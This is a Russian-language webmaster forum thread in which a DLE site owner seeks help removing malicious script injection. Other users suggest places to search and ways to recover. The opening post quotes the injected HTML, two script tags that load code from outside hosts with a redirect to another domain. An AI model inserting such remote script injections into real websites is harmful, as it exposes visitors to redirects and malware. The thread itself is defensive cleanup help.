DLE вирусяка. Помогите найти :(

12 3
WhiteFalke
На сайте с 16.09.2007
Offline
184
1687

Ребят подскажите где может эта дрянь сидеть.

<script type="text/javascript" src="http://taketop100.com/js/init.2.min.js"></script><script type="text/javascript" src="http://mxmoby.ru/js.php?redirect=http%3A//0c4.ru/g/go.php%3Fsid%3D1"></script>

Находится она перед - <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> в index.php не нашел, в engine.php тоже нет.

Может кто то подскажешь человека, который поможет все дыры в ДЛЕ залатать, ибо задолбали ломать сайт ур..ды..

vandamme
На сайте с 30.11.2008
Offline
675
#1

скачай к себе архив сайта на комп и проверь антивирусом

и notepad++ можно найти все файлы где эта строка лежит

vandamme добавил 30.09.2011 в 20:02

main.tpl глянь

manca
На сайте с 17.08.2008
Offline
170
#2

Посмотри еще в папке AJAX в js файлах лишний кусок кода

Куплю приложения ! рассмотрю любые, с доходом и без
SA
На сайте с 18.08.2009
Offline
15
#3

Отписался в асю, жду ответ.

A
На сайте с 18.05.2008
Offline
207
#4
WhiteFalke:
Может кто то подскажешь человека, который поможет все дыры в ДЛЕ залатать, ибо задолбали ломать сайт ур..ды..

Я вам бесплатно подскажу: Не храните пароли от фтп в тотал командоре. Хотя конечно и из некоторых других фтп клиентов тырят тоже.

Так что у вас по плану действия:

Снести фтп учетки в фтп менеджере.

Сменить пароль на хостинг аккаунт(+фтп).

Ну и далее уже спокойно искать у себя на локали трояна, который увел старые пароли.

При неудачном поиске - формат C: и установка ОС заново. И более не запускать кряки и прочий сомнительный фри софт/игры на рабочей машине.

LineHost.Org - Хостинг и VPS в Москве | VPS в США (http://linehost.org/) WebNicks.Com - Дешевая Регистрация Доменов Онлайн (http://webnicks.com/)
vandamme
На сайте с 30.11.2008
Offline
675
#5
SibAgent:
Отписался в асю, жду ответ.

а в асе нельзя было ответ ждать и отписываться?

WhiteFalke
На сайте с 16.09.2007
Offline
184
#6
SibAgent:
Отписался в асю, жду ответ.

Извиняюсь, не готов вам доверить сайт.

WhiteFalke добавил 30.09.2011 в 20:54

manca:
Посмотри еще в папке AJAX в js файлах лишний кусок кода

заменил их все - не помогло.. Код лишний там не нашел..

WhiteFalke добавил 30.09.2011 в 20:54

vandamme:
скачай к себе архив сайта на комп и проверь антивирусом
и notepad++ можно найти все файлы где эта строка лежит

vandamme добавил 30.09.2011 в 20:02
main.tpl глянь

сейчас попробую..

main.tpl - пуст

A
На сайте с 18.05.2008
Offline
207
#7

/templates/имя-шаблона/

видимо в какой то из tpl-ок

ewg777
На сайте с 04.06.2007
Offline
225
#8

Может быть в jpg'ах кодированный base64

WhiteFalke
На сайте с 16.09.2007
Offline
184
#9
ewg777:
Может быть в jpg'ах кодированный base64

а как его выявить?

WhiteFalke добавил 30.09.2011 в 21:16

addurl:
/templates/имя-шаблона/
видимо в какой то из tpl-ок

это врятли.

WhiteFalke добавил 30.09.2011 в 21:21

vandamme:
скачай к себе архив сайта на комп и проверь антивирусом
и notepad++ можно найти все файлы где эта строка лежит

не нашел.. видно закодированый идет гад

Хортица
На сайте с 22.12.2006
Offline
289
#10

WhiteFalke, доступ к ssh имеется ? Аську помнишь ?

На XBit.Money (https://xbit.money/?rid=111) меняю крипту на гривны. Лучшие курсы Обмен Вашего PayPal/ЯД/QIWI/WebMoney и куча плюшек! Рекомендую (https://exchangex.ru/index.php?who=26749)
12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий